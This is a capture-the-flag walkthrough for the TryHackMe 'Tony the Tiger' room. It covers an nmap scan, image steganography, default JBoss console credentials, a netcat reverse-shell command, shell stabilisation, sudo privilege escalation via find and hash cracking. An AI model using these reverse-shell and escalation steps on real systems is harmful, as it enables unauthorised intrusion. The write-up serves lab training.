Tony the Tiger - THM

nmap -sT 10.10.242.59 -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

The first flag, Tony's

The blog on port 80 holds the first flag. Take a look at the different posts there. If you find yourself poking around too much, stop looking at what meets the eye and go for stego. In the first post, you should download the picture and run strings against it. You should find your answer towards the bottom of the output.

The web server on 8080 shows there is an administration console. You should go there. A quick search on Google should tell you the default username and password for this kind of application (default credentials <application's name>). Once you have access to the console, poke around a little.

The second flag, JBoss

The exploit given with the room is easy to use. Run it with the -h flag to show the options. To obtain a shell, start a listener (nc -lvp <port>) and use it to run the command

nc <your ip> <port> -e /bin/bash

Stabilize the shell using 

python3 -c "import pty; pty.spawn('/bin/bash')"
export TERM=xterm

Then background this shell (Ctrl+x) and run (in your own shell)

stty raw -echo; fg

Poking around a little, I found that we can just easily walk into Jboss' home, there we find his flag. 

The path to root is easy to FIND

Besides the flag, a useful note shows us the password for this account, so we can change our current user into Jboss. After this, it's fairly straightforward. Jboss can run find as any other user on the system (sudo -l to see for yourself). Go check GTFobins to find a straight path to root. The flag is in /root, but with a twist: it's base64 encoded. Use a decoder (either command line or online tools) and paste the hash on crackstation (alternatively, save it to a file and run john against it).